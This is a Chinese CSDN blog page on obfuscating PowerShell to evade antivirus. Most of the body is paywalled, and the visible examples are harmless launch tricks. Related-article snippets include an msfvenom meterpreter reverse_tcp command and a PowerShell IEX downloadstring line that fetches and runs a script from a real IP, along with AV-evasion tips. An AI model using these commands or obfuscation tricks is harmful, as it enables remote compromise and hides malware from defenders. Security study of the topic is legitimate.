powershell代码混淆绕过

已于 2022-04-04 23:46:29 修改
阅读量1.4k 收藏 2
点赞数
分类专栏: powershell 文章标签: 安全
于 2020-06-21 15:03:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41082546/article/details/106885750
版权
powershell 专栏收录该内容
8 篇文章 1 订阅 ¥9.90 ¥99.00
订阅专栏
本文详细介绍了如何使用PowerShell进行代码混淆,包括通过cmd启动、管道输入流、环境变量、从其他进程获取参数、从粘贴板等方法。同时,讨论了混淆技术,如转义符、简写、通配符、脚本块、字符串处理、编码等,提供了多种混淆技巧和示例。最后提到了相关混淆和检测工具如Invoke-Obfuscation、Revoke-Obfuscation和xencrypt。
摘要由CSDN通过智能技术生成

目前大多数攻击者已经将PowerShell 利用在了各种攻击场景中,如内网渗透,APT攻击甚至包括现在流行的勒索软件中。powershell的功能强大且调用方式十分灵活。

1. cmd启动powershell

首先看看powershel使用cmd.exe启动执行代码的方式:

1.1 常规方法

cmd.exe /c "powershell -c Write-Host SUCCESS -Fore Green"

cmd.exe /c "echo Write-Host SUCCESS -Fore Green | powershell -"

cmd /c "set p1=power&& set p2=shell&& cmd /c echo Write-Host SUCCESS -Fore Green ^|%p1%%p2% -"

1.2 管道输入流

cmd.exe /c "echo Write-Host SUCCESS -Fore Green | powershell IEX $input"

了解本专栏 订阅专栏 解锁全文
Micr067
关注
专栏目录
订阅专栏
[网络安全提高篇] 一一三.Powershell恶意代码检测 (1)论文总结及抽象语法树(AST)提取
杨秀璋的专栏
03-11 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将详细讲解PowerShellPowershell恶意代码检测总结及抽象语法树(AST)提取。希望这篇文章对您有帮助,也推荐大家去阅读论文,且看且珍惜。
免杀对抗-PowerShell-混淆+分离
xiaoheizi的博客
09-15 776
解码代码:$xx=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($DoIt))被火绒杀死了,这个火绒真的搞不懂,只经过base64编码的让过了,经过base64编码又混淆的反而被杀。1.将文件模式的powershell使用Windows PowerShell ISE 打开,将文件中变量进行base64编码.3.命令模式powershell执行——直接将cs生成的txt文件中的命令复制到命令行执行。
powershell 中的字符串混淆
lacoucou的专栏
06-23 397
例子1 (VarIaBLE '*MDr*').naMe[3,11,2]-JoiN'' 执行结果是 iex 解析: PS > VarIaBLE '*MDr*' #执行命令 variable '*MDr' Name Value
PowerShell 开源项目教程
最新发布
gitblog_00493的博客
08-10 267
PowerShell 开源项目教程 PowerShell500+ PowerShell scripts (.ps1) for every system!项目地址:https://gitcode.com/gh_mirrors/powe/PowerShell 1. 项目的目录结构及介绍 目录结构 PowerShell/ ├── Contributors.md ├── LICENSE ├── READ...
PowerShell混淆相关
JiangBuLiu的博客
06-18 301
????????????相关技术文章2016.05.26-[利用机器学习检测恶意PowerShell](https://bbs.pediy.com/thread-230002.htm)2018.11.09-[FireEye - 基于机器学习的模糊命令行检测](https://www.fireeye.com/blog/threat-research/2018/11/obfuscated-command-line-detection-using-machine-learning.html)2018.11.28-
Powershell绕过执行及脚本混淆
hl1293348082的专栏
03-28 1281
为什么需要 powershell ?存在必然合理。微软的服务器操作系统因为缺乏一个强大的 Shell 备受诟病。而与之相对,Linux 的 Shell 可谓丰富并且强大。 Windows Server 的 Shell,也就是从 Dos 继承过来的命令行,处理简单问题尚可,一旦遇到稍微复杂一点的问题,它就会把本已复杂的问题,弄得更加复杂。 引入 VBScript,使得 WindowsServer 管理员处理问题的效率提高了不少。但 VBScript 是个脚本语言,即缺乏 Shell 的简单性,也不能.
免杀对抗-Powershell-混淆无文件
m0_62172162的博客
04-25 866
免杀对抗-Powershell-混淆无文件
Invoke-Obfuscation-Bypass + PS2EXE 绕过主流杀软1
08-03
混淆后的脚本使得杀毒软件难以解析其内部行为,从而可能绕过静态分析。 在描述中提到,通过将 Invoke-Obfuscation 应用到 C# 生成的 PowerShell 脚本上,然后使用 PS2EXE 工具将其转换为exe文件,可以有效地绕过...
第一百零六课:windows 单机免杀抓明文或hash [通过简单混淆编码绕过常规静态检测]1
08-03
本课程主要探讨如何通过混淆、编码以及反射加载等技术来绕过常规的静态检测,从而执行如Mimikatz这样的工具来抓取明文或哈希密码。 首先,简单混淆是一种常见的免杀手段。在描述中提到的例子中,使用了`sed`命令对...
Pcalua+Powershell混淆
reaido的博客
01-29 291
一、Pcalua加载shellcode 1、msfvenom生成shellcode msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=39.104.56.140 LPORT=7100 -f psh-reflection > a.ps1 2、混淆处理 powershell "$a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://39.104.56.140:7200/a.
PowerShell中使用正则表达式匹配字符串实例
10-25
主要介绍了PowerShell中使用正则表达式匹配字符串实例,主要介绍match操作符的使用,需要的朋友可以参考下
Ladon九种PowerShell命令混淆加密免杀方法
K8哥哥
11-02 1707
九种方式随机混淆PowerShell代码,防止管理员轻易还原,至少比默认明文或Base64隐蔽。 Base64就不说了是个人都能解,一是常用,二是工具多,管理员懂解很正常,所以不推荐。 Ladon提供的混淆方法,每点一次按钮就随机会生成不同的命令,但是执行的都是同个功能 管理员想反查就得每一条都研究如何解密,给管理员增加难度,就是给自己增加控制时间。 更新功能 GUI 2020.10.18 [+] PowerShell转EXE,EXE转PowerShell EXE->Powershell PowerS
探秘Chimera:绕过安全防护的PowerShell代码混淆利器
gitblog_00031的博客
05-14 402
探秘Chimera:绕过安全防护的PowerShell代码混淆利器 项目地址:https://gitcode.com/tokyoneon/Chimera 在网络安全的世界里,总有那么一些工具,它们的存在既是对安全挑战的回应,也是对技术创新的致敬。Chimera就是这样一款工具,它是一款专门设计用来绕过AMSI(Antivirus Message Signaling Interface)和杀毒软件...
APT污水 - 使用多阶段高度混淆PowerShell在内存中运行
JiangBuLiu的博客
05-31 4697
通过恶意宏开启多阶段高隐藏攻击链拥有历史传承的社工手法????宏入口UserForm2.Gladiator_CRKUserForm1注册表PowerShell 拥有历史传承的社工手法???? 文档打开后会通过模糊图片和文字欺骗受害者启用宏。宏代码运行后会弹出虚假的提示,表示“由于版本不兼容所以无法查看文档。”等: 污水这个显示效果和文字内容已经使用很久了: 宏 入口 从宏代码的入口就可以发现这个攻击链有一些特殊,并不是所有代码都放在默认的位置一次性执行。先从入口的“Document_Open()”函数执
powershell恶意脚本解混淆
信息安全
11-11 1832
文章目录前言分析总结 前言 现在许多病毒作者为了免杀,使用powershell脚本来执行恶意行为的病毒越来越多,这次分析的一个样本就是利用powershell混淆来隐藏嵌在其中的cs后门dll 分析 样本代码 从图上可以很清晰的知道存放了一段base64数据,首先将base64数据解密,使用gzip解压,解压的数据进行执行 想要解密,也很简单: IEX用于将字符串作为命令执行,当去掉IEX后,再文件尾加上| out-file decode.txt 将 IEX (New-Object IO.StreamRe
论文解读 --- 《针对PowerShell脚本的有效轻量级去混淆和语义感知攻击检测》
罗斯839的博客
04-15 1545
一种有效的混淆代码还原方法
记一次powershell混淆(2)
weixin_30342827的博客
03-30 648
样本地址 https://www.hybrid-analysis.com/sample/4b4b8b13c264c8f7d7034060e0e4818a573bebc576a94d7b13b4c1741591687f?environmentId=100# 样本使用ConvertTo-SecureString加密字符串。 代码 powershell "([RUNTiME.iNTeRopsErV...
powershell混淆与PS2EXE打包:绕过主流杀软的实战教程
在本文中,我们讨论了一种名为"Invoke-Obfuscation-Bypass + PS2EXE"的技术,这是一种针对Windows PowerShell脚本的绕过主流安全软件策略的方法。该技术利用PowerShell脚本的混淆技术和PS2EXE工具,旨在隐藏恶意代码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Micr067

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值